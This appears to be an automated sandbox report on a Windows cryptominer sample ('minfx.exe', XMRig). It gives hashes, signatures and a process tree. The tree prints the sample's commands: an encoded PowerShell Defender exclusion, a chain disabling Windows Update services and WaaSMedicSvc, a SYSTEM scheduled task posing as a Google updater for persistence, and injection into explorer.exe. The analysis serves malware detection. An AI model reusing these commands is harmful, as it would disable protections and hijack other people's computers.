Analysis
-
max time kernel
155s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
13-05-2022 17:54
Static task
static1
Behavioral task
behavioral1
Sample
minfx.exe
Resource
win7-20220414-en
General
-
Target
minfx.exe
-
Size
4.2MB
-
MD5
8268ff95b3aaea6d6de8f02a73c323d2
-
SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca
-
SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
-
SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
Malware Config
Signatures
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3008-208-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/3008-209-0x000000014036DAD4-mapping.dmp xmrig behavioral2/memory/3008-210-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/3008-211-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/3008-213-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1276 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4400 takeown.exe 5000 icacls.exe 1124 takeown.exe 496 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4400 takeown.exe 5000 icacls.exe 1124 takeown.exe 496 icacls.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 3424 set thread context of 3136 3424 conhost.exe conhost.exe PID 3424 set thread context of 3008 3424 conhost.exe explorer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exeexplorer.exepid process 4892 powershell.exe 4892 powershell.exe 3988 conhost.exe 3576 powershell.exe 3576 powershell.exe 3424 conhost.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe 3008 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 3988 conhost.exe Token: SeShutdownPrivilege 1148 powercfg.exe Token: SeCreatePagefilePrivilege 1148 powercfg.exe Token: SeShutdownPrivilege 4408 powercfg.exe Token: SeCreatePagefilePrivilege 4408 powercfg.exe Token: SeShutdownPrivilege 4392 powercfg.exe Token: SeCreatePagefilePrivilege 4392 powercfg.exe Token: SeShutdownPrivilege 1388 powercfg.exe Token: SeCreatePagefilePrivilege 1388 powercfg.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 3424 conhost.exe Token: SeShutdownPrivilege 2920 powercfg.exe Token: SeCreatePagefilePrivilege 2920 powercfg.exe Token: SeShutdownPrivilege 2968 powercfg.exe Token: SeCreatePagefilePrivilege 2968 powercfg.exe Token: SeShutdownPrivilege 3312 powercfg.exe Token: SeCreatePagefilePrivilege 3312 powercfg.exe Token: SeShutdownPrivilege 1380 powercfg.exe Token: SeCreatePagefilePrivilege 1380 powercfg.exe Token: SeLockMemoryPrivilege 3008 explorer.exe Token: SeLockMemoryPrivilege 3008 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
minfx.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 888 wrote to memory of 3988 888 minfx.exe conhost.exe PID 888 wrote to memory of 3988 888 minfx.exe conhost.exe PID 888 wrote to memory of 3988 888 minfx.exe conhost.exe PID 3988 wrote to memory of 1700 3988 conhost.exe cmd.exe PID 3988 wrote to memory of 1700 3988 conhost.exe cmd.exe PID 1700 wrote to memory of 4892 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 4892 1700 cmd.exe powershell.exe PID 3988 wrote to memory of 4476 3988 conhost.exe cmd.exe PID 3988 wrote to memory of 4476 3988 conhost.exe cmd.exe PID 3988 wrote to memory of 4536 3988 conhost.exe cmd.exe PID 3988 wrote to memory of 4536 3988 conhost.exe cmd.exe PID 4476 wrote to memory of 5044 4476 cmd.exe sc.exe PID 4476 wrote to memory of 5044 4476 cmd.exe sc.exe PID 4476 wrote to memory of 3052 4476 cmd.exe sc.exe PID 4476 wrote to memory of 3052 4476 cmd.exe sc.exe PID 4536 wrote to memory of 1148 4536 cmd.exe powercfg.exe PID 4536 wrote to memory of 1148 4536 cmd.exe powercfg.exe PID 4476 wrote to memory of 1864 4476 cmd.exe sc.exe PID 4476 wrote to memory of 1864 4476 cmd.exe sc.exe PID 4476 wrote to memory of 3664 4476 cmd.exe sc.exe PID 4476 wrote to memory of 3664 4476 cmd.exe sc.exe PID 4536 wrote to memory of 4408 4536 cmd.exe powercfg.exe PID 4536 wrote to memory of 4408 4536 cmd.exe powercfg.exe PID 3988 wrote to memory of 3188 3988 conhost.exe cmd.exe PID 3988 wrote to memory of 3188 3988 conhost.exe cmd.exe PID 4536 wrote to memory of 4392 4536 cmd.exe powercfg.exe PID 4536 wrote to memory of 4392 4536 cmd.exe powercfg.exe PID 4476 wrote to memory of 1508 4476 cmd.exe sc.exe PID 4476 wrote to memory of 1508 4476 cmd.exe sc.exe PID 3188 wrote to memory of 5004 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 5004 3188 cmd.exe schtasks.exe PID 4476 wrote to memory of 4136 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4136 4476 cmd.exe sc.exe PID 4536 wrote to memory of 1388 4536 cmd.exe powercfg.exe PID 4536 wrote to memory of 1388 4536 cmd.exe powercfg.exe PID 4476 wrote to memory of 3352 4476 cmd.exe sc.exe PID 4476 wrote to memory of 3352 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4144 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4144 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4540 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4540 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2364 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2364 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2496 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2496 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2392 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2392 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2664 4476 cmd.exe sc.exe PID 4476 wrote to memory of 2664 4476 cmd.exe sc.exe PID 4476 wrote to memory of 3872 4476 cmd.exe sc.exe PID 4476 wrote to memory of 3872 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4740 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4740 4476 cmd.exe sc.exe PID 4476 wrote to memory of 4400 4476 cmd.exe takeown.exe PID 4476 wrote to memory of 4400 4476 cmd.exe takeown.exe PID 4476 wrote to memory of 5000 4476 cmd.exe icacls.exe PID 4476 wrote to memory of 5000 4476 cmd.exe icacls.exe PID 4476 wrote to memory of 4768 4476 cmd.exe reg.exe PID 4476 wrote to memory of 4768 4476 cmd.exe reg.exe PID 4476 wrote to memory of 1404 4476 cmd.exe reg.exe PID 4476 wrote to memory of 1404 4476 cmd.exe reg.exe PID 4476 wrote to memory of 1564 4476 cmd.exe reg.exe PID 4476 wrote to memory of 1564 4476 cmd.exe reg.exe PID 4476 wrote to memory of 2748 4476 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\minfx.exe"C:\Users\Admin\AppData\Local\Temp\minfx.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""4⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""4⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Chrome\updater.exe4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
-
C:\Windows\system32\sc.exesc stop bits7⤵
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
443B
MD58add56521ef894ef0c66ecd3e989d718
SHA12058aa5185fd5dcce7263bef8fe35bf5e12dbc7f
SHA25601bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724
SHA512af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5a8e8360d573a4ff072dcc6f09d992c88
SHA13446774433ceaf0b400073914facab11b98b6807
SHA256bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA5124ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
